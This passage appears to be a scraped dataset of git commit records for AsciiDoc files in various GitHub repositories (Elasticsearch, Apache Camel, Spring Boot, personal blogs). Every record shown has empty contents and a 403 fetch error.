h,jprante\/elasticsearch,LeoYao\/elasticsearch,i-am-Nathan\/elasticsearch,mikemccand\/elasticsearch,qwerty4030\/elasticsearch","old_file":"docs\/reference\/setup\/sysconfig\/file-descriptors.asciidoc","new_file":"docs\/reference\/setup\/sysconfig\/file-descriptors.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cf015b34b0a4cff770ece28127cc8679bde1bbcb","subject":"Update 2011-12-26-2354-Les-classes-internes-ou-la-tambouille-du-compilateur-Java.adoc","message":"Update 
2011-12-26-2354-Les-classes-internes-ou-la-tambouille-du-compilateur-Java.adoc","repos":"jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io","old_file":"_posts\/2011-12-26-2354-Les-classes-internes-ou-la-tambouille-du-compilateur-Java.adoc","new_file":"_posts\/2011-12-26-2354-Les-classes-internes-ou-la-tambouille-du-compilateur-Java.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jcsirot\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f79d981f7c425fb4c504eaeda3e9814539aa5b1e","subject":"CAMEL-10721: connector docs","message":"CAMEL-10721: connector docs\n","repos":"dmvolod\/camel,prashant2402\/camel,akhettar\/camel,chirino\/camel,kevinearls\/camel,lburgazzoli\/apache-camel,alvinkwekel\/camel,kevinearls\/camel,RohanHart\/camel,chirino\/camel,zregvart\/camel,prashant2402\/camel,cunningt\/camel,curso007\/camel,jamesnetherton\/camel,RohanHart\/camel,rmarting\/camel,apache\/camel,acartapanis\/camel,pmoerenhout\/camel,scranton\/camel,jonmcewen\/camel,apache\/camel,apache\/camel,Thopap\/camel,jkorab\/camel,NickCis\/camel,cunningt\/camel,drsquidop\/camel,curso007\/camel,w4tson\/camel,onders86\/camel,kevinearls\/camel,anoordover\/camel,onders86\/camel,zregvart\/camel,NickCis\/camel,pax95\/camel,veithen\/camel,anoordover\/camel,tdiesler\/camel,anton-k11\/camel,mgyongyosi\/camel,tlehoux\/camel,Thopap\/camel,punkhorn\/camel-upstream,jonmcewen\/camel,ssharma\/camel,apache\/camel,adessaigne\/camel,punkhorn\/camel-upstream,mcollovati\/camel,pkletsko\/camel,christophd\/camel,adessaigne\/camel,davidkarlsen\/camel,jonmcewen\/camel,gnodet\/camel,apache\/camel,objectiser\/camel,mgyongyosi\/camel,nicolaferraro\/camel,RohanHart\/camel,objectiser\/camel,cunningt\/camel,mcollovati\/camel,DariusX\/camel,DariusX\/camel,punkhorn\/camel-upstream,davidkarlsen\/camel,pkletsko\/camel,objectiser\/camel,anton-k11\/camel,tlehoux\/camel,tlehoux\/camel,acartapanis\/camel,jonmcewen\/camel,chirino\/camel,ssharma\/camel,driseley\/camel,tdiesler\/camel,gnodet\/camel,nboukhed\/camel,Thopap\/camel,christophd\/camel,pkletsko\/camel,prashant2402\/camel,anton-k11\/camel,jamesnetherton\/camel,pmoerenhout\/camel,drsquidop\/camel,RohanHart\/camel,apache\/camel,pkletsko\/camel,adessaigne\/camel,RohanHart\/camel,Fabryprog\/camel,lburgazzoli\/camel,mcollovati\/camel,dmvolod\/camel,ullgren\/camel,Thopap\/camel,drsquidop\/camel,Thopap\/camel,CodeSmell\/camel,yuruki\/camel,driseley\/camel,isavin\/camel,prashant2402\/camel,cunningt\/camel,tdiesler\/camel,jonmcewen\/camel,pkletsko\/camel,sverkera\/camel,kevinearls\/camel,veithen\/camel,pax95\/camel,lburgazzoli\/camel,veithen\/camel,curso007\/camel,allancth\/camel,allancth\/camel,drsquidop\/camel,nikhilvibhav\/camel,ssharma\/camel,anoordover\/camel,anoordover\/camel,gnodet\/camel,jamesnetherton\/camel,driseley\/camel,ullgren\/camel,drsquidop\/camel,driseley\/camel,CodeSmell\/camel,rmarting\/camel,w4tson\/camel,cunningt\/camel,zregvart\/camel,CodeSmell\/camel,scranton\/camel,w4tson\/camel,akhettar\/camel,Fabryprog\/camel,tadayosi\/camel,akhettar\/camel,gnodet\/camel,sverkera\/camel,allancth\/camel,adessaigne\/camel,CodeSmell\/camel,akhettar\/camel,scranton\/camel,dmvolod\/camel,jkorab\/camel,w4tson\/camel,snurmine\/camel,pmoerenhout\/camel,curso007\/camel,sverkera\/camel,anoordover\/camel,NickCis\/camel,lburgazzoli\/apache-camel,christophd\/camel,ullgren\/camel,salikjan\/camel,jamesnetherton\/camel,gautric\/camel,lburgazzoli\/camel,akhetta
r\/camel,lburgazzoli\/apache-camel,isavin\/camel,christophd\/camel,snurmine\/camel,nboukhed\/camel,tadayosi\/camel,lburgazzoli\/camel,nicolaferraro\/camel,sverkera\/camel,drsquidop\/camel,isavin\/camel,anton-k11\/camel,DariusX\/camel,onders86\/camel,yuruki\/camel,scranton\/camel,snurmine\/camel,davidkarlsen\/camel,objectiser\/camel,dmvolod\/camel,yuruki\/camel,christophd\/camel,nicolaferraro\/camel,mgyongyosi\/camel,snurmine\/camel,tlehoux\/camel,curso007\/camel,jamesnetherton\/camel,gautric\/camel,isavin\/camel,mgyongyosi\/camel,chirino\/camel,nikhilvibhav\/camel,prashant2402\/camel,cunningt\/camel,lburgazzoli\/camel,acartapanis\/camel,gautric\/camel,w4tson\/camel,akhettar\/camel,acartapanis\/camel,acartapanis\/camel,rmarting\/camel,jonmcewen\/camel,jkorab\/camel,rmarting\/camel,jkorab\/camel,mcollovati\/camel,allancth\/camel,dmvolod\/camel,tdiesler\/camel,onders86\/camel,pmoerenhout\/camel,driseley\/camel,kevinearls\/camel,rmarting\/camel,tlehoux\/camel,tadayosi\/camel,gautric\/camel,pmoerenhout\/camel,chirino\/camel,ullgren\/camel,Fabryprog\/camel,ssharma\/camel,nboukhed\/camel,alvinkwekel\/camel,nikhilvibhav\/camel,veithen\/camel,Thopap\/camel,veithen\/camel,chirino\/camel,snurmine\/camel,jkorab\/camel,onders86\/camel,w4tson\/camel,tdiesler\/camel,mgyongyosi\/camel,pkletsko\/camel,ssharma\/camel,pax95\/camel,dmvolod\/camel,pmoerenhout\/camel,allancth\/camel,NickCis\/camel,rmarting\/camel,mgyongyosi\/camel,ssharma\/camel,NickCis\/camel,gautric\/camel,prashant2402\/camel,RohanHart\/camel,lburgazzoli\/apache-camel,sverkera\/camel,curso007\/camel,veithen\/camel,adessaigne\/camel,snurmine\/camel,nicolaferraro\/camel,zregvart\/camel,nikhilvibhav\/camel,jamesnetherton\/camel,kevinearls\/camel,scranton\/camel,tlehoux\/camel,yuruki\/camel,isavin\/camel,pax95\/camel,alvinkwekel\/camel,acartapanis\/camel,yuruki\/camel,yuruki\/camel,driseley\/camel,anton-k11\/camel,DariusX\/camel,isavin\/camel,gautric\/camel,jkorab\/camel,davidkarlsen\/camel,anton-k11\/camel,anoordover\/camel,tdiesler\/camel,adessaigne\/camel,tadayosi\/camel,nboukhed\/camel,alvinkwekel\/camel,salikjan\/camel,allancth\/camel,lburgazzoli\/apache-camel,Fabryprog\/camel,punkhorn\/camel-upstream,nboukhed\/camel,NickCis\/camel,gnodet\/camel,lburgazzoli\/apache-camel,onders86\/camel,sverkera\/camel,nboukhed\/camel,tadayosi\/camel,christophd\/camel,pax95\/camel,pax95\/camel,lburgazzoli\/camel,tadayosi\/camel,scranton\/camel","old_file":"connectors\/camel-connector\/src\/main\/docs\/connector-component.adoc","new_file":"connectors\/camel-connector\/src\/main\/docs\/connector-component.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/allancth\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cb7651af2bdde5e81f7568e603712ef2ae5efdbf","subject":"Translation in progress","message":"Translation in progress\n","repos":"sardine\/spring-ref-ja","old_file":"src\/asciidoc\/web-mvc.adoc","new_file":"src\/asciidoc\/web-mvc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sardine\/spring-ref-ja.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"389560adb8db112f0db0a9243986b19551b5ab65","subject":"update title","message":"update 
title","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/issue_with_tests.adoc","new_file":"content\/writings\/issue_with_tests.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"0fd3b67f7994645dd1572adc7f54fe30074deebd","subject":"docs : Create CONTRIBUTING file","message":"docs : Create CONTRIBUTING file\n","repos":"gravitee-io\/gravitee-definition","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee-definition.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f4bb9e3ba7106481c96cfbe03db6e10c45a68ea8","subject":"Polish doc","message":"Polish doc\n\nCloses gh-5404\n","repos":"NetoDevel\/spring-boot,sbcoba\/spring-boot,htynkn\/spring-boot,pvorb\/spring-boot,sebastiankirsch\/spring-boot,ollie314\/spring-boot,htynkn\/spring-boot,Nowheresly\/spring-boot,chrylis\/spring-boot,vakninr\/spring-boot,kdvolder\/spring-boot,tiarebalbi\/spring-boot,yangdd1205\/spring-boot,aahlenst\/spring-boot,zhanhb\/spring-boot,jbovet\/spring-boot,jxblum\/spring-boot,drumonii\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,jbovet\/spring-boot,wilkinsona\/spring-boot,akmaharshi\/jenkins,eddumelendez\/spring-boot,zhanhb\/spring-boot,kamilszymanski\/spring-boot,xiaoleiPENG\/my-project,afroje-reshma\/spring-boot-sample,scottfrederick\/spring-boot,rweisleder\/spring-boot,candrews\/spring-boot,hello2009chen\/spring-boot,shangyi0102\/spring-boot,linead\/spring-boot,wilkinsona\/spring-boot,tiarebalbi\/spring-boot,SaravananParthasarathy\/SPSDemo,joshiste\/spring-boot,pvorb\/spring-boot,mbogoevici\/spring-boot,deki\/spring-boot,ptahchiev\/spring-boot,candrews\/spring-boot,habuma\/spring-boot,philwebb\/spring-boot,jayarampradhan\/spring-boot,kamilszymanski\/spring-boot,donhuvy\/spring-boot,joshiste\/spring-boot,spring-projects\/spring-boot,vpavic\/spring-boot,jbovet\/spring-boot,michael-simons\/spring-boot,mbogoevici\/spring-boot,spring-projects\/spring-boot,SaravananParthasarathy\/SPSDemo,spring-projects\/spring-boot,dreis2211\/spring-boot,bjornlindstrom\/spring-boot,mbenson\/spring-boot,scottfrederick\/spring-boot,sebastiankirsch\/spring-boot,wilkinsona\/spring-boot,yangdd1205\/spring-boot,kamilszymanski\/spring-boot,vpavic\/spring-boot,DeezCashews\/spring-boot,mbenson\/spring-boot,rweisleder\/spring-boot,javyzheng\/spring-boot,Nowheresly\/spring-boot,deki\/spring-boot,sbcoba\/spring-boot,zhanhb\/spring-boot,joshthornhill\/spring-boot,isopov\/spring-boot,donhuvy\/spring-boot,hello2009chen\/spring-boot,vakninr\/spring-boot,ihoneymon\/spring-boot,candrews\/spring-boot,bijukunjummen\/spring-boot,joshthornhill\/spring-boot,lucassaldanha\/spring-boot,bijukunjummen\/spring-boot,jayarampradhan\/spring-boot,felipeg48\/spring-boot,RichardCSantana\/spring-boot,yhj630520\/spring-boot,jxblum\/spring-boot,nebhale\/spring-boot,Buzzardo\/spring-boot,DeezCashews\/spring-boot,Buzzardo\/spring-boot,NetoDevel\/spring-boot,lexandro\/spring-boot,lburgazzoli\/spring-boot,spring-projects\/spring-boot,candrews\/spring-boot,vakninr\/spring-boot,felipeg48\/spring-boot,philwebb\/spring-boot,zhanhb\/spring-boot,hqrt\/jenkins2-course-spring-boot,bijukunjummen\/spring-boot,bclozel\/spring-boot,royclarkson\/spring-boot,shangyi0102\/spring-boot,micha
el-simons\/spring-boot,jbovet\/spring-boot,bclozel\/spring-boot,hqrt\/jenkins2-course-spring-boot,shakuzen\/spring-boot,herau\/spring-boot,dreis2211\/spring-boot,akmaharshi\/jenkins,isopov\/spring-boot,brettwooldridge\/spring-boot,sebastiankirsch\/spring-boot,RichardCSantana\/spring-boot,kdvolder\/spring-boot,spring-projects\/spring-boot,vpavic\/spring-boot,tiarebalbi\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,vpavic\/spring-boot,herau\/spring-boot,akmaharshi\/jenkins,olivergierke\/spring-boot,tsachev\/spring-boot,ilayaperumalg\/spring-boot,minmay\/spring-boot,jvz\/spring-boot,scottfrederick\/spring-boot,lenicliu\/spring-boot,habuma\/spring-boot,yhj630520\/spring-boot,akmaharshi\/jenkins,wilkinsona\/spring-boot,cleverjava\/jenkins2-course-spring-boot,olivergierke\/spring-boot,habuma\/spring-boot,joshthornhill\/spring-boot,cleverjava\/jenkins2-course-spring-boot,herau\/spring-boot,qerub\/spring-boot,joshiste\/spring-boot,linead\/spring-boot,kdvolder\/spring-boot,xiaoleiPENG\/my-project,ilayaperumalg\/spring-boot,bjornlindstrom\/spring-boot,NetoDevel\/spring-boot,shangyi0102\/spring-boot,joshiste\/spring-boot,jvz\/spring-boot,deki\/spring-boot,jmnarloch\/spring-boot,dreis2211\/spring-boot,sbcoba\/spring-boot,izeye\/spring-boot,brettwooldridge\/spring-boot,lenicliu\/spring-boot,ptahchiev\/spring-boot,tsachev\/spring-boot,izeye\/spring-boot,bijukunjummen\/spring-boot,lenicliu\/spring-boot,olivergierke\/spring-boot,DeezCashews\/spring-boot,kdvolder\/spring-boot,royclarkson\/spring-boot,tsachev\/spring-boot,zhanhb\/spring-boot,sbcoba\/spring-boot,aahlenst\/spring-boot,scottfrederick\/spring-boot,izeye\/spring-boot,eddumelendez\/spring-boot,bclozel\/spring-boot,philwebb\/spring-boot-concourse,chrylis\/spring-boot,lexandro\/spring-boot,izeye\/spring-boot,felipeg48\/spring-boot,ilayaperumalg\/spring-boot,mbogoevici\/spring-boot,joshthornhill\/spring-boot,royclarkson\/spring-boot,isopov\/spring-boot,ihoneymon\/spring-boot,aahlenst\/spring-boot,thomasdarimont\/spring-boot,bbrouwer\/spring-boot,sebastiankirsch\/spring-boot,herau\/spring-boot,aahlenst\/spring-boot,drumonii\/spring-boot,bclozel\/spring-boot,bjornlindstrom\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,bbrouwer\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,thomasdarimont\/spring-boot,jxblum\/spring-boot,rweisleder\/spring-boot,javyzheng\/spring-boot,joshiste\/spring-boot,kdvolder\/spring-boot,mbogoevici\/spring-boot,mosoft521\/spring-boot,habuma\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,spring-projects\/spring-boot,chrylis\/spring-boot,lexandro\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,shakuzen\/spring-boot,dreis2211\/spring-boot,mdeinum\/spring-boot,eddumelendez\/spring-boot,jayarampradhan\/spring-boot,rweisleder\/spring-boot,ilayaperumalg\/spring-boot,dreis2211\/spring-boot,eddumelendez\/spring-boot,lexandro\/spring-boot,vpavic\/spring-boot,drumonii\/spring-boot,wilkinsona\/spring-boot,michael-simons\/spring-boot,brettwooldridge\/spring-boot,linead\/spring-boot,shakuzen\/spring-boot,philwebb\/spring-boot-concourse,Buzzardo\/spring-boot,thomasdarimont\/spring-boot,hello2009chen\/spring-boot,philwebb\/spring-boot,wilkinsona\/spring-boot,ilayaperumalg\/spring-boot,cleverjava\/jenkins2-course-spring-boot,philwebb\/spring-boot-concourse,ilayaperumalg\/spring-boot,herau\/spring-boot,lburgazzoli\/spring-boot,htynkn\/spring-boot,Buzzardo\/spring-boot,drumonii\/spring-boot,yhj630520\/spring-boot,jbovet\/spring-boot,SaravananParthasarathy\/SPSDemo,michael-simons\/spring-boot,tsachev\/spring-b
oot,hello2009chen\/spring-boot,habuma\/spring-boot,nebhale\/spring-boot,kamilszymanski\/spring-boot,isopov\/spring-boot,Buzzardo\/spring-boot,aahlenst\/spring-boot,lucassaldanha\/spring-boot,jvz\/spring-boot,shakuzen\/spring-boot,hello2009chen\/spring-boot,jayarampradhan\/spring-boot,michael-simons\/spring-boot,i007422\/jenkins2-course-spring-boot,i007422\/jenkins2-course-spring-boot,philwebb\/spring-boot,qerub\/spring-boot,donhuvy\/spring-boot,javyzheng\/spring-boot,lburgazzoli\/spring-boot,afroje-reshma\/spring-boot-sample,lenicliu\/spring-boot,minmay\/spring-boot,jvz\/spring-boot,rweisleder\/spring-boot,vpavic\/spring-boot,bclozel\/spring-boot,tsachev\/spring-boot,deki\/spring-boot,jxblum\/spring-boot,philwebb\/spring-boot,zhanhb\/spring-boot,i007422\/jenkins2-course-spring-boot,bbrouwer\/spring-boot,xiaoleiPENG\/my-project,candrews\/spring-boot,yangdd1205\/spring-boot,olivergierke\/spring-boot,yhj630520\/spring-boot,mbenson\/spring-boot,thomasdarimont\/spring-boot,ollie314\/spring-boot,chrylis\/spring-boot,mbogoevici\/spring-boot,donhuvy\/spring-boot,eddumelendez\/spring-boot,minmay\/spring-boot,hqrt\/jenkins2-course-spring-boot,linead\/spring-boot,mosoft521\/spring-boot,shakuzen\/spring-boot,olivergierke\/spring-boot,chrylis\/spring-boot,yhj630520\/spring-boot,afroje-reshma\/spring-boot-sample,htynkn\/spring-boot,mdeinum\/spring-boot,ollie314\/spring-boot,RichardCSantana\/spring-boot,minmay\/spring-boot,Nowheresly\/spring-boot,DeezCashews\/spring-boot,SaravananParthasarathy\/SPSDemo,ihoneymon\/spring-boot,lburgazzoli\/spring-boot,cleverjava\/jenkins2-course-spring-boot,drumonii\/spring-boot,mosoft521\/spring-boot,ptahchiev\/spring-boot,royclarkson\/spring-boot,joshthornhill\/spring-boot,NetoDevel\/spring-boot,jxblum\/spring-boot,kamilszymanski\/spring-boot,RichardCSantana\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,chrylis\/spring-boot,xiaoleiPENG\/my-project,lexandro\/spring-boot,jayarampradhan\/spring-boot,htynkn\/spring-boot,afroje-reshma\/spring-boot-sample,NetoDevel\/spring-boot,DeezCashews\/spring-boot,SaravananParthasarathy\/SPSDemo,felipeg48\/spring-boot,pvorb\/spring-boot,ihoneymon\/spring-boot,tiarebalbi\/spring-boot,sebastiankirsch\/spring-boot,qerub\/spring-boot,htynkn\/spring-boot,ptahchiev\/spring-boot,vakninr\/spring-boot,lburgazzoli\/spring-boot,mbenson\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,bbrouwer\/spring-boot,ollie314\/spring-boot,mbenson\/spring-boot,jmnarloch\/spring-boot,philwebb\/spring-boot-concourse,isopov\/spring-boot,tiarebalbi\/spring-boot,rweisleder\/spring-boot,royclarkson\/spring-boot,drumonii\/spring-boot,scottfrederick\/spring-boot,javyzheng\/spring-boot,cleverjava\/jenkins2-course-spring-boot,jmnarloch\/spring-boot,bijukunjummen\/spring-boot,Nowheresly\/spring-boot,pvorb\/spring-boot,sbcoba\/spring-boot,i007422\/jenkins2-course-spring-boot,philwebb\/spring-boot,mosoft521\/spring-boot,tiarebalbi\/spring-boot,lucassaldanha\/spring-boot,habuma\/spring-boot,qerub\/spring-boot,scottfrederick\/spring-boot,ptahchiev\/spring-boot,vakninr\/spring-boot,hqrt\/jenkins2-course-spring-boot,michael-simons\/spring-boot,jmnarloch\/spring-boot,ihoneymon\/spring-boot,tsachev\/spring-boot,shangyi0102\/spring-boot,akmaharshi\/jenkins,brettwooldridge\/spring-boot,deki\/spring-boot,lucassaldanha\/spring-boot,philwebb\/spring-boot-concourse,dreis2211\/spring-boot,felipeg48\/spring-boot,kdvolder\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,mevasaroj\/jenkins2-course-spring-boot,shangyi0102\/spring-boot,linead\/spring-boot,lenicliu\/spring
-boot,nebhale\/spring-boot,afroje-reshma\/spring-boot-sample,shakuzen\/spring-boot,izeye\/spring-boot,nebhale\/spring-boot,mosoft521\/spring-boot,mbenson\/spring-boot,ptahchiev\/spring-boot,donhuvy\/spring-boot,xiaoleiPENG\/my-project,mdeinum\/spring-boot,bclozel\/spring-boot,ollie314\/spring-boot,qerub\/spring-boot,ihoneymon\/spring-boot,lucassaldanha\/spring-boot,javyzheng\/spring-boot,joshiste\/spring-boot,felipeg48\/spring-boot,jxblum\/spring-boot,bjornlindstrom\/spring-boot,aahlenst\/spring-boot,brettwooldridge\/spring-boot,Nowheresly\/spring-boot,donhuvy\/spring-boot,hqrt\/jenkins2-course-spring-boot,bjornlindstrom\/spring-boot,jvz\/spring-boot,pvorb\/spring-boot,i007422\/jenkins2-course-spring-boot,mdeinum\/spring-boot,RichardCSantana\/spring-boot,mdeinum\/spring-boot,isopov\/spring-boot,Buzzardo\/spring-boot,eddumelendez\/spring-boot,minmay\/spring-boot,bbrouwer\/spring-boot,thomasdarimont\/spring-boot,jmnarloch\/spring-boot,nebhale\/spring-boot,mdeinum\/spring-boot","old_file":"spring-boot-docs\/src\/main\/asciidoc\/spring-boot-features.adoc","new_file":"spring-boot-docs\/src\/main\/asciidoc\/spring-boot-features.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mbogoevici\/spring-boot.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"710870f43518733909040d57715fa29200a4e743","subject":"Update 2016-06-10-A-W-S-W-A-F-Certificate-Manager-Cloud-Front.adoc","message":"Update 2016-06-10-A-W-S-W-A-F-Certificate-Manager-Cloud-Front.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-10-A-W-S-W-A-F-Certificate-Manager-Cloud-Front.adoc","new_file":"_posts\/2016-06-10-A-W-S-W-A-F-Certificate-Manager-Cloud-Front.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"98664b04b495ab9b802127a2c420df4f7431b125","subject":"Publish 17-07-2016-Estilos-de-aprendizaje-e-Innovacion-educativa.adoc","message":"Publish 17-07-2016-Estilos-de-aprendizaje-e-Innovacion-educativa.adoc","repos":"marchelo2212\/marchelo2212.github.io,marchelo2212\/marchelo2212.github.io,marchelo2212\/marchelo2212.github.io","old_file":"17-07-2016-Estilos-de-aprendizaje-e-Innovacion-educativa.adoc","new_file":"17-07-2016-Estilos-de-aprendizaje-e-Innovacion-educativa.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/marchelo2212\/marchelo2212.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"18b9dd552d03b143946a1e5b370104c75be0b001","subject":"Update 2016-03-29-Zonas-de-transferencia.adoc","message":"Update 2016-03-29-Zonas-de-transferencia.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-29-Zonas-de-transferencia.adoc","new_file":"_posts\/2016-03-29-Zonas-de-transferencia.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"f8632498bfcbaa669f49713bfca19541aed09cf2","subject":"y2b create post The Invisible iPhone Button...","message":"y2b create post The Invisible iPhone Button...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-11-27-TheInvisibleiPhoneButton.adoc","new_file":"_posts\/2017-11-27-TheInvisibleiPhoneButton.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d72768d489ddf7c17ca856d145f800cda509cd18","subject":"y2b create post NVIDIA Project Shield: My Thoughts (CES 2013)","message":"y2b create post NVIDIA Project Shield: My Thoughts (CES 2013)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-01-15-NVIDIA-Project-Shield-My-Thoughts-CES-2013.adoc","new_file":"_posts\/2013-01-15-NVIDIA-Project-Shield-My-Thoughts-CES-2013.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9f8d080289549f106dfa02d94302581b119e6ca5","subject":"Update 2019-01-31-Indoor-Skareparks-for-dorsethampshire-area.adoc","message":"Update 2019-01-31-Indoor-Skareparks-for-dorsethampshire-area.adoc","repos":"joelcbailey\/joelcbailey.github.io,joelcbailey\/joelcbailey.github.io,joelcbailey\/joelcbailey.github.io,joelcbailey\/joelcbailey.github.io","old_file":"_posts\/2019-01-31-Indoor-Skareparks-for-dorsethampshire-area.adoc","new_file":"_posts\/2019-01-31-Indoor-Skareparks-for-dorsethampshire-area.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/joelcbailey\/joelcbailey.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"67422ae93faf807a56bab516385959c338ab43fe","subject":"Update 2017-07-20-Learned-Primal-Dual-reconstruction.adoc","message":"Update 2017-07-20-Learned-Primal-Dual-reconstruction.adoc","repos":"adler-j\/adler-j.github.io,adler-j\/adler-j.github.io","old_file":"_posts\/2017-07-20-Learned-Primal-Dual-reconstruction.adoc","new_file":"_posts\/2017-07-20-Learned-Primal-Dual-reconstruction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adler-j\/adler-j.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b773d1c540416d8e8e5ee13fbdf0d101c8772d5c","subject":"Update static\/vendors\/ace-builds\/demo\/kitchen-sink\/docs\/asciidoc.asciidoc","message":"Update static\/vendors\/ace-builds\/demo\/kitchen-sink\/docs\/asciidoc.asciidoc\n\nSigned-off-by: Bernard Ojengwa <fccb4cc00c1ba7e51bf5c2b5f77130b9fe8d917e@gmail.com>\n","repos":"apipanda\/openssl,apipanda\/openssl,apipanda\/openssl,apipanda\/openssl","old_file":"static\/vendors\/ace-builds\/demo\/kitchen-sink\/docs\/asciidoc.asciidoc","new_file":"static\/vendors\/ace-builds\/demo\/kitchen-sink\/docs\/asciidoc.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apipanda\/openssl.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"07ea69ce4df7f47b2c7b3f8ecc87ca524255f6e4","subject":"Update 2016-12-30-Kleptography-in-RSA.adoc","message":"Update 2016-12-30-Kleptography-in-RSA.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-12-30-Kleptography-in-RSA.adoc","new_file":"_posts\/2016-12-30-Kleptography-in-RSA.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7042d7ae8a77e0fcd19405f4e99c125e58a5f1a3","subject":"CAMEL-10843 - very initial, checking it in considering better than nothing","message":"CAMEL-10843 - very initial, checking it in considering better than nothing\n","repos":"pkletsko\/camel,yuruki\/camel,gnodet\/camel,prashant2402\/camel,anoordover\/camel,sverkera\/camel,onders86\/camel,sverkera\/camel,Thopap\/camel,CodeSmell\/camel,scranton\/camel,jamesnetherton\/camel,isavin\/camel,nicolaferraro\/camel,mgyongyosi\/camel,gnodet\/camel,nikhilvibhav\/camel,nikhilvibhav\/camel,rmarting\/camel,alvinkwekel\/camel,Thopap\/camel,rmarting\/camel,tadayosi\/camel,anoordover\/camel,tdiesler\/camel,zregvart\/camel,sverkera\/camel,mcollovati\/camel,Thopap\/camel,anoordover\/camel,drsquidop\/camel,anoordover\/camel,punkhorn\/camel-upstream,gautric\/camel,davidkarlsen\/camel,tlehoux\/camel,DariusX\/camel,christophd\/camel,anoordover\/camel,pmoerenhout\/camel,pmoerenhout\/camel,scranton\/camel,acartapanis\/camel,jonmcewen\/camel,apache\/camel,curso007\/camel,isavin\/camel,anton-k11\/camel,snurmine\/camel,scranton\/camel,akhettar\/camel,cunningt\/camel,onders86\/camel,mcollovati\/camel,gnodet\/camel,objectiser\/camel,CodeSmell\/camel,dmvolod\/camel,Fabryprog\/camel,isavin\/camel,apache\/camel,yuruki\/camel,pax95\/camel,adessaigne\/camel,zregvart\/camel,Thopap\/camel,jamesnetherton\/camel,anton-k11\/camel,kevinearls\/camel,curso007\/camel,curso007\/camel,drsquidop\/camel,punkhorn\/camel-upstream,jamesnetherton\/camel,onders86\/camel,yuruki\/camel,mgyongyosi\/camel,tlehoux\/camel,adessaigne\/camel,Fabryprog\/camel,isavin\/camel,jonmcewen\/camel,pkletsko\/camel,jonmcewe